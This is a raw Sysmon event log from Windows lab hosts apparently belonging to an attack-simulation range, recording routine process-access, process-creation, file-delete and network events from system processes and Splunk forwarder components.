12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018880Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018879Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E669-63C7-4202-00000000B002}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018878Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E669-63C7-4202-00000000B002}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018877Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.942{E5A8D418-E669-63C7-4202-00000000B002}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018876Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.345{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27CDF2A44FF337A42033C19EA035B5B6,SHA256=202435309D9E2A98BEF6A719225FD753165656941AEDF715218C9F52ED8D16E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.919{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E669-63C7-9906-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E669-63C7-9906-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.904{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E669-63C7-9906-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.781{FE4C2B44-E669-63C7-9906-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000047785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.373{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9B799D57AA806AD1B414138DF0EE79C,SHA256=839126A6C044F13EA7EC8A0ED922CC6618EB9729076B5B2B5595F9938168E15C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.373{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7897C58315B7DED08577FEC92C742171,SHA256=E03E7E931B3A693A4F2525E9CC38476757F16FD67DDE3191AF36ECACE9BDFEB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.279{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8921208C:\Windows\system32\svchost.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.279{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8921208C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.279{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8921208C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.186{FE4C2B44-E669-63C7-9806-00000000AF02}21524288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E669-63C7-9806-00000000AF02}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E669-63C7-9806-00000000AF02}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.033{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E669-63C7-9806-00000000AF02}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:33.034{FE4C2B44-E669-63C7-9806-00000000AF02}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018875Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.173{E5A8D418-E668-63C7-4102-00000000B002}32683588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018874Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:30.931{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50196-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018890Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:34.511{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B12437265F517A6A7BA550925E4028F0,SHA256=4ADCB46E49BB14235ACFC2E1489CAC0FF99CEE4DB5FAC3A5872E59C13555A6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.948{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 